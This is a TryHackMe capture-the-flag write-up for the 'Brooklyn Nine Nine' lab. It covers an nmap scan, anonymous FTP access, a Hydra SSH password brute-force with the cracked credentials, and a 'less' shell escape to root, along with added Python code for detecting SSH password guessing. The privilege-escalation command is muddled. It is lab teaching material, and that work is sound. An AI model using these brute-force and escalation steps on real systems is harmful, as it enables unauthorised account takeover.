TryHackMe | Brooklyn Nine Nine - Penetration Testing CTF

건우Sec 2024. 11. 24. 17:28

TASK 1 Deploy and get hacking

User flag.

Let's start with a port scan.

nmap -sV -sC -A 10.10.45.180

 

Output

nmap -sV -sC -A 10.10.45.180 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 02:51 EST
Nmap scan report for 10.10.45.180
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.63.34
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

 

Open ports

21/tcp open  ftp     vsftpd 3.0.3

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

 

Let's visit the web page.

gobuster

I'll use gobuster to enumerate paths.

Nothing special seems to be there, so I'll skip it.

The earlier port scan showed that an FTP server was open.

Let's log in to the FTP server.

 

ftp 10.10.45.180

 

 

get note_to_jake.txt

 

note_to_jake.txt is at this path.

Let's download it.

Next

It looks like Amy asked Jake to change his password.

Let's crack Jake's account with Hydra.

 

Hydra

hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://10.10.45.180

 

ID : Jake
PW : 987654321
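
Seen from the defender's side, a Hydra run like the one above shows up in the SSH auth log as a burst of failed passwords for one account from one source, here followed by a success. The detection logic below is an added example, not part of the original post; the log lines are constructed, and the function name, threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH syslog lines: "<Mon DD HH:MM:SS> <host> sshd[pid]: Failed|Accepted password for ..."
LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_guessing(lines, threshold=5, window=timedelta(minutes=5), year=2024):
    """Alert on password guessing and on a login that follows it (hypothetical helper)."""
    recent = defaultdict(deque)  # (source, user) -> times of failures inside the window
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd password event
        stamp, result, user, src = m.groups()
        # syslog timestamps carry no year; `year` is an assumption of this example
        when = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        fails = recent[(src, user)]
        while fails and when - fails[0] > window:
            fails.popleft()  # forget failures older than the window
        if result == "Failed":
            fails.append(when)
            if len(fails) == threshold:
                alerts.append(("guessing", src, user))
        else:
            if len(fails) >= threshold:
                alerts.append(("login_after_guessing", src, user))
            fails.clear()
    return alerts

# Constructed sample log (documentation IP ranges, placeholder hostname).
SAMPLE = [
    f"Nov 24 08:01:{s:02d} host sshd[2211]: Failed password for jake "
    f"from 192.0.2.10 port {40000 + s} ssh2"
    for s in range(6)
] + [
    "Nov 24 08:01:07 host sshd[2211]: Accepted password for jake from 192.0.2.10 port 40007 ssh2",
    "Nov 24 08:03:10 host sshd[2302]: Failed password for amy from 198.51.100.7 port 51544 ssh2",
    "Nov 24 08:03:21 host sshd[2302]: Accepted password for amy from 198.51.100.7 port 51544 ssh2",
    "Nov 24 08:04:00 host CRON[2400]: pam_unix(cron:session): session opened for user root",
]

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE):
        print(alert)
```

The "login_after_guessing" alert is the one that matters for response: it marks an account whose password was guessed, not just attacked. A single mistyped password followed by a success, as in the constructed amy lines, raises nothing.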

 

Now let's log in over SSH with jake's ID and password.

Under the /home directory (cd /home)

there was a file called Holt, and I found user.txt in it.

Userflag : ee11cbb19052e (omitted)

Nice!

 

/usr/bin/less

 

https://gtfobins.github.io/gtfobins/less/

 


 

Let's check GTFOBins for anything related to /usr/bin/less.

 

nano less /etc/profile

 

At the very bottom

!/bin/sh

 

With that, we have successfully obtained root privileges.

Root flag : 3a9f0ea7bb980 (omitted)

Difficulty: 1/10

One-line review: an easy CTF